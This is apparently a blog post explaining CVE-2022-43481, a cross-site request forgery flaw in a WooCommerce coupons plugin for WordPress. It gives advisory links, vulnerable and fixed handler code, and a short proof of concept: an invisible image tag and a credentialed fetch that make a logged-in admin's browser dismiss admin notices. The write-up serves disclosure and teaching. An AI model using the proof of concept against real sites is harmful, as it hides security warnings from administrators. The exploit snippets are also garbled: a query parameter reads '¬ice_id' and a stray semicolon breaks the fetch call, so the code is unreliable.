---
The world of WordPress plugins is vast and ever-growing, but with convenience comes responsibility. In this long read, we take a deep dive into CVE-2022-43481—a Cross-Site Request Forgery (CSRF) vulnerability found in the popular “Advanced Coupons for WooCommerce Coupons” plugin up to version 4.5. This bug, while not granting total control to attackers, allows them to trick logged-in administrators into unknowingly dismissing important admin notices. These notices are often crucial for plugin operation, updates, and security.
Let’s break down how this vulnerability works, see some simple proof-of-concept code, and talk protection.
What is CVE-2022-43481?
This is an exploit that targets a missing nonce check in the way the Advanced Coupons for WooCommerce Coupons plugin handles AJAX requests used for dismissing admin notices. In simpler words: If you’re logged in as an administrator and visit a malicious website, that site can send a request—on your behalf—to your own WordPress admin, making you unknowingly remove important notifications.
Official Advisory:
- WPScan: https://wpscan.com/vulnerability/190a1e71-ac5f-484-8af6-ee06643b8b45
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-43481
- Patchstack: https://patchstack.com/database/vulnerability/advanced-coupons-for-woocommerce-free/wordpress-advanced-coupons-for-woocommerce-free-plugin-4-5-cross-site-request-forgery-csrf-vulnerability
How Does the Attack Work?
The plugin has an AJAX handler that lets you, as an admin, dismiss certain admin notices. Unfortunately, it used only the user’s permissions—not a security nonce—to validate these actions. No anti-CSRF token means anyone who can make you visit a crafted web page (think: phishing email, malicious ad, or even a compromised site) could trick your browser into sending the “dismiss notice” request.
The attacker’s goal here isn't to take over the site; rather, it’s to manipulate your admin experience. In some scenarios, attackers could use this to cover their traces by hiding security warnings or notifications about malicious plugins.
Simple Proof-of-Concept (PoC) Exploit
Here’s how a proof-of-concept exploit could look in HTML/JavaScript. If an administrator is logged into their WordPress dashboard and visits this code (maybe on a compromised website), it fires the dismiss request silently in the background:
<!DOCTYPE html>
<html>
<body>
<!-- Replace 'your-wordpress-site.com' with the target site domain -->
<img src="https://your-wordpress-site.com/wp-admin/admin-ajax.php?action=acfw_dismiss_admin_notice¬ice_id=acfw_some_notice_id"; style="display:none">
</body>
</html>
Or, using JavaScript for more flexibility
fetch("https://your-wordpress-site.com/wp-admin/admin-ajax.php?action=acfw_dismiss_admin_notice¬ice_id=acfw_some_notice_id";, {
credentials: "include"
});
What’s happening here?
Any logged-in admin’s browser will send the request, with their cookies included. WordPress sees this as a real admin dismissing a notice—no warning, no pop-up, just quiet removal of potentially vital messages.
Why Should You Care?
Even “minor” CSRF vulnerabilities matter. Hidden notices could delay patching of more serious security holes or allow other attacks to go unnoticed. Think of it as a way for hackers to erase their fingerprints after picking a lock.
Avoid browsing untrusted websites while logged in as an admin.
Developers:
- Always use check_admin_referer() or other nonce-verification functions for any action that changes settings, even if it seems harmless.
Here’s a simplified example of where things went wrong (in pseudocode)
// BAD: No CSRF token check
add_action('wp_ajax_acfw_dismiss_admin_notice', function() {
$notice_id = $_GET['notice_id'];
if ( current_user_can('manage_woocommerce') ) {
// ... dismiss notice logic ...
}
});
Proper nonce protection should look like
add_action('wp_ajax_acfw_dismiss_admin_notice', function() {
if ( ! check_ajax_referer('acfw_dismiss_notice', '_wpnonce', false) ) {
wp_send_json_error( 'Invalid nonce', 403 );
return;
}
$notice_id = $_GET['notice_id'];
if ( current_user_can('manage_woocommerce') ) {
// ... dismiss notice logic ...
}
});
More Data & References
- Original Patch: https://plugins.trac.wordpress.org/changeset/2813707/advanced-coupons-for-woocommerce-free
- Changelog: https://plugins.trac.wordpress.org/log/advanced-coupons-for-woocommerce-free/
Final Thoughts
While CVE-2022-43481 won’t let hackers take over your site, it still underscores why even “trivial” bugs matter. It’s a reminder to update plugins and check your site’s security stance regularly. If you use Advanced Coupons for WooCommerce Coupons, make sure you’re running a secured version.
Timeline
Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 13:54:00 UTC